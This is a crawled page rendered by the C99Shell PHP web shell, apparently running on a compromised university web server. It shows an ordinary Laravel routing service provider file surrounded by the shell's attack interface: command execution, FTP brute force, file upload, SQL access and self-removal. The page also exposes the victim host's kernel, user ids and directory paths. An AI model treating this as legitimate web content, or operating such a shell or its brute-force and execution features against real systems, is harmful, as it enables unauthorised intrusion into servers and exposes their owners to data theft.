!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Routing/   drwxr-xr-x
Free 116.5 GB of 200.55 GB (58.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     RoutingServiceProvider.php (3.97 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Routing;

use 
Illuminate\Support\ServiceProvider;
use 
Zend\Diactoros\Response as PsrResponse;
use 
Symfony\Bridge\PsrHttpMessage\Factory\DiactorosFactory;

class 
RoutingServiceProvider extends ServiceProvider
{
    
/**
     * Register the service provider.
     *
     * @return void
     */
    
public function register()
    {
        
$this->registerRouter();

        
$this->registerUrlGenerator();

        
$this->registerRedirector();

        
$this->registerPsrRequest();

        
$this->registerPsrResponse();

        
$this->registerResponseFactory();
    }

    
/**
     * Register the router instance.
     *
     * @return void
     */
    
protected function registerRouter()
    {
        
$this->app['router'] = $this->app->share(function ($app) {
            return new 
Router($app['events'], $app);
        });
    }

    
/**
     * Register the URL generator service.
     *
     * @return void
     */
    
protected function registerUrlGenerator()
    {
        
$this->app['url'] = $this->app->share(function ($app) {
            
$routes $app['router']->getRoutes();

            
// The URL generator needs the route collection that exists on the router.
            // Keep in mind this is an object, so we're passing by references here
            // and all the registered routes will be available to the generator.
            
$app->instance('routes'$routes);

            
$url = new UrlGenerator(
                
$routes$app->rebinding(
                    
'request'$this->requestRebinder()
                )
            );

            
$url->setSessionResolver(function () {
                return 
$this->app['session'];
            });

            
// If the route collection is "rebound", for example, when the routes stay
            // cached for the application, we will need to rebind the routes on the
            // URL generator instance so it has the latest version of the routes.
            
$app->rebinding('routes', function ($app$routes) {
                
$app['url']->setRoutes($routes);
            });

            return 
$url;
        });
    }

    
/**
     * Get the URL generator request rebinder.
     *
     * @return \Closure
     */
    
protected function requestRebinder()
    {
        return function (
$app$request) {
            
$app['url']->setRequest($request);
        };
    }

    
/**
     * Register the Redirector service.
     *
     * @return void
     */
    
protected function registerRedirector()
    {
        
$this->app['redirect'] = $this->app->share(function ($app) {
            
$redirector = new Redirector($app['url']);

            
// If the session is set on the application instance, we'll inject it into
            // the redirector instance. This allows the redirect responses to allow
            // for the quite convenient "with" methods that flash to the session.
            
if (isset($app['session.store'])) {
                
$redirector->setSession($app['session.store']);
            }

            return 
$redirector;
        });
    }

    
/**
     * Register a binding for the PSR-7 request implementation.
     *
     * @return void
     */
    
protected function registerPsrRequest()
    {
        
$this->app->bind('Psr\Http\Message\ServerRequestInterface', function ($app) {
            return (new 
DiactorosFactory)->createRequest($app->make('request'));
        });
    }

    
/**
     * Register a binding for the PSR-7 response implementation.
     *
     * @return void
     */
    
protected function registerPsrResponse()
    {
        
$this->app->bind('Psr\Http\Message\ResponseInterface', function ($app) {
            return new 
PsrResponse();
        });
    }

    
/**
     * Register the response factory implementation.
     *
     * @return void
     */
    
protected function registerResponseFactory()
    {
        
$this->app->singleton('Illuminate\Contracts\Routing\ResponseFactory', function ($app) {
            return new 
ResponseFactory($app['Illuminate\Contracts\View\Factory'], $app['redirect']);
        });
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0323 ]--